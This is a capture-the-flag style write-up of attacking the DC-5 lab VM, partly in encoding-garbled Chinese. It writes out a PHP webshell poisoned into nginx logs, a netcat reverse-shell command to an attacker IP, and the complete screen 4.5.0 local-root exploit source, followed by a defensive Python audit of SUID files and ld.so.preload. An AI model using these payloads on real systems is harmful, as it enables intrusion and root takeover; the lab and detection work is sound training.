DC-5 Target Machine Penetration Test
Table of contents
- Environment versions:
- I. Information gathering
- 1. Host discovery
- 2. Port scanning
- II. Vulnerability discovery
- 1. Accessing the target's web service
- 2. Attempting to exploit the file inclusion vulnerability
- 3. Attempting to write a malicious file into the log
- 4. Using the file inclusion to access the log and exploit it
- III. Privilege escalation
- 1. Checking which commands can be run with root privileges
- 2. Vulnerability search
- 3. Locating the exploit and reviewing its contents
- 4. Transferring files with FTP
Environment versions:
- VMware Pro 16
- Kali 2021.1 (virtual machine)
- DC-5 (virtual machine)
I. Information gathering
1. Host discovery
arp-scan -l
2. Port scanning
nmap -A -p- 192.168.2.186
Scanning the discovered hosts one by one shows that 192.168.2.186 is the target.
It has port 80 open (nginx), port 111 (rpcbind) and port 39424, no idea what service that is, hmm.
II. Vulnerability discovery
1. Accessing the target's web service
After clicking Contact -> Submit on the home page, refreshing the page that comes back makes the year in the footer change randomly.
This suggests a file inclusion vulnerability.
2. Attempting to exploit the file inclusion vulnerability
http://192.168.2.186/thankyou.php?file=/etc/passwd
發(fā)現(xiàn)存在該漏洞
3.嘗試將惡意文件寫(xiě)入日志
使用 BP 對(duì)該網(wǎng)頁(yè)進(jìn)行抓包、構(gòu)造流量包
/thankyou.php?<?php system($_GET['cmd']); ?>
4.利用文件包含訪問(wèn)日志并進(jìn)行利用
攻擊機(jī)開(kāi)始監(jiān)聽(tīng):
nc -lvvp 1234 #使用 nc 進(jìn)行連接利用
使用 BP 利用上一步的一句話木馬進(jìn)行命令執(zhí)行
/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.2.123 1234
得到靶機(jī) shell
III. Privilege escalation
1. Checking which commands can be run with root privileges
find / -perm -u=s -type f 2>/dev/null
This turns up screen-4.5.0.
2. Vulnerability search
searchsploit screen 4.5.0
3. Locating the exploit and reviewing its contents
cd /usr/share/exploitdb/exploits/linux/local
cat ./41154.sh
It compiles two C files under /tmp and then runs a number of commands.
Here I split this file into 3 files:
libhax.c
#include <stdio.h>
#include <sys/stat.h>   /* chmod */
#include <sys/types.h>
#include <unistd.h>     /* chown, unlink */
/* constructor: runs automatically when the library is loaded via /etc/ld.so.preload */
__attribute__ ((__constructor__))
void dropshell(void) {
    chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload"); printf("[+] done!\n");
}
rootshell.c
#include <stdio.h>
#include <unistd.h>     /* setuid/setgid/seteuid/setegid, execvp */
int main(void) {
    char *const argv[] = { "/bin/sh", NULL };
    setuid(0); setgid(0); seteuid(0); setegid(0);
    execvp("/bin/sh", argv); /* execvp takes (file, argv) */
    return 1;
}
41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
將這三個(gè)文件放在同一個(gè)文件夾內(nèi),使用下述命令對(duì) 2 個(gè) c 文件進(jìn)行編譯、移除舊文件
gcc -fPIC -shared -ldl -o ./libhax.so ./libhax.c
rm -f ./libhax.c
gcc -o ./rootshell ./rootshell.c
rm -f ./rootshell.c
使用 vim 對(duì) 41154.sh 文件進(jìn)行格式轉(zhuǎn)換
vim ./exp.sh
:set ff=unix
:wq
4. Transferring files with FTP
1) Set up an FTP service with vsftpd (on the attacking machine)
apt-get install vsftpd
2) Change the configuration
vim /etc/vsftpd.conf #edit the config file
Change it to the following (adjust to your needs):
# Whether to listen for IPv4 and IPv6 traffic
listen=NO
# Whether to listen for IPv6 traffic
listen_ipv6=YES
# Allow anonymous FTP? (Disabled by default).
# Whether to allow anonymous login without a password
anonymous_enable=NO
# Uncomment this to allow local users to log in.
local_enable=YES
# Uncomment this to enable any form of FTP write command.
# Whether logged-in users may upload files
write_enable=YES
# Default umask for local users is 077. You may wish to change this to 022,
# if your users expect that (022 is used by most other ftpd's)
# Default permissions to mask off for local users
local_umask=022
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=YES
#
# If enabled, vsftpd will display directory listings with the time
# in your local time zone. The default is to display GMT. The
# times returned by the MDTM FTP command are also affected by this
# option.
use_localtime=YES
#
# Activate logging of uploads/downloads.
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data).
connect_from_port_20=YES
# You may override where the log file goes if you like. The default is shown
# below.
xferlog_file=/var/log/vsftpd.log
#
# If you want, you can have your log file in standard ftpd xferlog format.
# Note that the default log file location is /var/log/xferlog in this case.
xferlog_std_format=YES
# You may fully customise the login banner string:
# Welcome message sent on login
ftpd_banner=Welcome to FTP service.
# You may specify an explicit list of local users to chroot() to their home
# directory. If chroot_local_user is YES, then this list becomes a list of
# users to NOT chroot().
# (Warning! chroot'ing can be very dangerous. If using chroot, make sure that
# the user does not have write access to the top level directory within the
# chroot)
# Whether to confine local users
chroot_local_user=YES
# Enable the whitelist (with chroot_local_user=YES these users are NOT chrooted)
chroot_list_enable=YES
# (default follows)
# Path of the whitelist; create the file if it does not exist
chroot_list_file=/etc/vsftpd.chroot_list
# This option should be the name of a directory which is empty. Also, the
# directory should not be writable by the ftp user. This directory is used
# as a secure chroot() jail at times vsftpd does not require filesystem
# access.
secure_chroot_dir=/var/run/vsftpd/empty
#
# This string is the name of the PAM service vsftpd will use.
# pam_service_name=vsftpd
# On Ubuntu-based systems this needs to be changed to ftp
pam_service_name=ftp
# This option specifies the location of the RSA certificate to use for SSL
# encrypted connections.
rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
ssl_enable=NO
#
# Uncomment this to indicate that vsftpd use a utf8 filesystem.
# Use UTF-8 throughout so Chinese file names are recognised and not garbled
utf8_filesystem=YES
3)創(chuàng)建 ftp 用戶
useradd -m ftpuser #創(chuàng)建用戶
passwd ftpuser #更改密碼
cd /home
chmod 777 ftpuser
touch /etc/vsftpd.chroot_list #創(chuàng)建白名單文件
echo "ftpuser" > /etc/vsftpd.chroot_list
service vsftpd restart #重啟服務(wù)
4)ftp 傳輸文件及利用 exp
靶機(jī) shell:
cd /tmp
python -c "import pty;pty.spawn('/bin/sh')"
ftp 192.168.1.131 #因?yàn)槲腋鼡Q了網(wǎng)絡(luò),所以攻擊機(jī)ip變了
ftpuser
ftpuser
ls
ftp> get 41154.sh
ftp> get libhax.so
ftp> get rootshell
ftp> quit
chmod +x ./41154.sh
./41154.sh
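As an added example of the defender's side of section III (my own code, not from the post or the exploit), the Python below does what `find / -perm -u=s -type f` does, compares the result against an assumed allowlist of stock SUID binaries, and inspects /etc/ld.so.preload, the file the screen 4.5.0 exploit overwrites. `build_demo_tree()` constructs a throwaway directory mimicking the DC-5 findings so the check runs offline.

```python
import os
import stat
import tempfile
# Assumed allowlist of SUID-root binaries a stock Debian host carries; trim it to the host being audited.
EXPECTED_SUID = {"su", "sudo", "passwd", "mount", "umount", "chsh", "chfn", "gpasswd", "newgrp"}
def find_setuid_files(root):
    """Equivalent of find ROOT -perm -u=s -type f: regular files carrying the setuid bit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def unexpected_setuid(root, expected=EXPECTED_SUID):
    """Setuid files not in the allowlist, e.g. a setuid screen-4.5.0."""
    return [p for p in find_setuid_files(root) if os.path.basename(p) not in expected]

def check_ld_preload(etc_dir="/etc"):
    """ld.so.preload is injected into every dynamically linked process: it should be absent, or root-owned, not world-writable, and name only existing libraries outside temp dirs."""
    path = os.path.join(etc_dir, "ld.so.preload")
    if not os.path.lexists(path):
        return {"present": False, "entries": [], "problems": []}
    st = os.lstat(path)
    problems = []
    if st.st_uid != 0:
        problems.append("not owned by root")
    if st.st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    with open(path, "rb") as fh:
        entries = [l.strip() for l in fh.read().decode(errors="replace").splitlines() if l.strip()]
    for lib in entries:
        if lib.startswith(("/tmp/", "/var/tmp/", "/dev/shm/")) or not os.path.exists(lib):
            problems.append(f"suspicious entry: {lib}")
    return {"present": True, "entries": entries, "problems": problems}

def build_demo_tree():
    """Constructed throwaway tree mimicking DC-5: a setuid screen-4.5.0 plus the preload file the exploit writes."""
    base = tempfile.mkdtemp(prefix="suid-audit-")
    for sub in (("usr", "bin"), ("etc",)):
        os.makedirs(os.path.join(base, *sub))
    for name, mode in (("passwd", 0o4755), ("screen-4.5.0", 0o4755), ("ls", 0o755)):
        path = os.path.join(base, "usr", "bin", name)
        open(path, "w").close()
        os.chmod(path, mode)
    with open(os.path.join(base, "etc", "ld.so.preload"), "w") as fh:
        fh.write("\n/tmp/libhax.so")   # the same content 41154.sh writes
    return base
```

On a real host call `unexpected_setuid("/")` and `check_ld_preload()` as root; a non-empty result from either is what a setuid screen or a planted preload file looks like from the inside.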
Notes:
- After sending several crafted packets the target machine hung; the fix was to give the target VM more memory.
- When transferring the exploit from the attacking machine to the target, I considered using nc but could not connect; it may be a path permission problem.
- The /tmp folder has permissions 777.
- During this test I tried 5 times and found that sometimes the one-line webshell gets written to error.log instead.
Summary